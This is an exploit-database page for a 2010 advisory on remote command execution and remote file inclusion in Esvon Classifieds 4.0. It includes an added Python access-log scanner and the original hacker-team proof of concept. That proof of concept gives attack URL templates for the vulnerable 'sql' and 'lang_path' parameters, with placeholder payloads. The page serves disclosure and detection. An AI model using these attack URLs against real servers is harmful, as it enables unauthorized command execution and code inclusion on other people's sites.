Vendor: Esvon Classifieds
By: Sn!pEr.S!Te Hacker
CVSS: 7,5 (HIGH)
Remote Command Execution and Remote File Inclusion
CWE: 78, 94
Product Name: Esvon Classifieds
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:esvon:esvon_classifieds:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Remote Command Execution Vulnerability and Remote File Inclusion Vulnerability

Two scripts in Esvon Classifieds, pdo.inc.php and class.phpmailer.php, are vulnerable to Remote Command Execution and Remote File Inclusion respectively. An attacker can exploit them by sending a maliciously crafted URL to the vulnerable server: the 'sql' parameter carries the malicious code for Remote Command Execution, and the 'lang_path' parameter carries it for Remote File Inclusion.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any SQL query or file inclusion.
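
For checking web server access logs against this advisory, the following added example (not part of the original advisory or of the vendor's code) flags requests to the two scripts and query parameters named on this page. The combined log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script suffix -> query parameters named in the advisory on this page.
WATCHED = {
    "/inc/pdo.inc.php": {"sql"},
    "/inc/class.phpmailer.php": {"lang_path", "lang_type"},
}
# Assumed log format: Apache/nginx "combined".
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# A value that starts with scheme:// points the include at a URL or stream wrapper.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

def inspect(line):
    """Return a finding dict for a request to a watched script, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    for script, params in WATCHED.items():
        if not url.path.lower().endswith(script):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        hits = sorted(params.intersection(query))
        return {
            "client": client,
            "script": script,
            "status": int(status),
            "params": hits,  # empty list: direct request to an include file
            "remote_value": any(SCHEME_RE.match(v) for p in hits for v in query[p]),
        }
    return None

def scan(lines):
    """Findings for every matching line, in log order."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation IP ranges, placeholder values).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Aug/2010:10:00:01 +0000] "GET /esvon_cl_3_0_demo/inc/pdo.inc.php?sql=PLACEHOLDER HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [27/Aug/2010:10:00:07 +0000] "GET /esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_path=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.9 - - [27/Aug/2010:10:01:12 +0000] "GET /esvon_cl_3_0_demo/index.php?lang_path=en HTTP/1.1" 200 4310 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with a 200 status and a non-empty `params` list is the case to investigate first; files under `inc/` are include files and have no reason to be requested directly.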

Exploit-DB raw data:

1 ########################################## 1
0 I'm Sn!pEr.S!Te Hacker member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------------------------
# Remote Command Execution Vulnerability and Remote File Inclusion Vulnerability 
# ------------------------------------------------------------------------------
# Esvon Classifieds ( pdo.inc.php ) (class.phpmailer.php )
--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 27-8-2010
#  [+] Script : Programs » Esvon Classifieds#  
# [+]Version: [4.0] # 
# [+] Download:http://www.esvon.com/products/esvon_cl_3_0_demo.zip
 ---------------------------------------------------------------
-=[ exploit ]=-

command:

http://localhost/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command] 
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command]
----------------------------------------------------------------------

File inclusion :

http://localhost/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_path=[inj3ct0r RFI]
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_type=[inj3ct0r RFI]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== Greetz ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited

===========================all my friend ===================================
* PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi |
* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA   |